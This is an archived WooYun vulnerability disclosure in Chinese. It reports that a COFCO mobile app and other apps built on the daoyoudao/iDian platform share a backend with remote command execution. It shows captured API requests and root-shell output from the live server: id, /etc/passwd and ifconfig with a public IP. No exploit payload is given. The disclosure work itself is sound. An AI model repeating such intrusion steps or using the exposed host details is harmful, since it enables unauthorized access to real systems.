乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-20: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-01-04: 厂商已经主动忽略漏洞,细节向公众公开
话说怎么这么多的恶意APP呢,就是这样来的吧!从点到面,APP云端安全不闹!
首先关注了中粮的一个app,在抓包分析的过程中发现其数据并不是到中粮,而是到了另外的站点请求如下:
GET api.cy.daoyoudao.com/app/diydishlist.do?groupid=11016&shopid=12112&curpage=1&pagesize=15&type=commend&clientid=201311201117453907286&versionrelease=ios_ HTTP/1.1Host: api.cy.daoyoudao.comAccept-Encoding: gzipUser-Agent: ä¸ç²®å顶åæ¦ 2.2.1 (iPhone; iPhone OS 7.0.4; zh_CN)Connection: keep-aliveProxy-Connection: keep-alive
根据Host找到他的官网
http://www.daoyoudao.com/全球领先的APP开放平台iDian是全球领先的集APP制作、发布、管理、统计于一体的开放平台。通过这个平台,iDian平台合作伙伴不需要任何技术背景,就可以帮助客户轻松制作、发布、管理APP。iDian开放平台不但承载道有道研发的APP产品,同时还不断吸纳出色的开发者,汇聚企业APP行业最丰富、最优秀、最具性价比的产品。选择iDian,选择APP行业。iDian现正面向全球招募合作伙伴。
是一个平台哦,看看是不是有其他的客户app
客户还不少,再次去下载一个app(西部影城)查看其中的请求
GET /app/gettourmenulist.do?tenantid=10296&shopid=0&systype=ios HTTP/1.1Host: api.sh2.daoyoudao.comAccept-Encoding: gzipUser-Agent: 西é¨å½±å 2.4.0 (iPhone; iPhone OS 7.0.4; zh_CN)Connection: keep-aliveProxy-Connection: keep-alive
确实是出自同一平台!要是能……的确他还确实存在远程命令执行
接下来就简单了GETshell
目测几万APP~恣意更改呀!
[/usr/local/industry/sh2/api/]$ iduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:java_t:SystemLow-SystemHigh[/usr/local/industry/sh2/api/]$ cat /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinavahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologingdm:x:42:42::/var/gdm:/sbin/nologinmysql:x:500:500::/home/mysql:/bin/bashnagios:x:501:501::/home/nagios:/bin/bash[/usr/local/industry/sh2/api/]$ [/usr/local/industry/sh2/api/]$ ipconfig/bin/sh: ipconfig: command not found[/usr/local/industry/sh2/api/]$ ifconfigeth0 Link encap:Ethernet HWaddr F0:1F:AF:DC:E9:31 inet addr:211.144.132.51 Bcast:211.144.132.63 Mask:255.255.255.224 inet6 addr: fe80::f21f:afff:fedc:e931/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:306157769 errors:0 dropped:0 overruns:0 frame:0 TX packets:323832613 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:166805423119 (155.3 GiB) TX bytes:276261539837 (257.2 GiB) Interrupt:177 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:80762571 errors:0 dropped:0 overruns:0 frame:0 TX packets:80762571 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:252860008976 (235.4 GiB) TX bytes:252860008976 (235.4 GiB)
话说怎么这么多的恶意APP呢,就是这样来的吧!
人民群众需要安全的平台!
未能联系到厂商或者厂商积极拒绝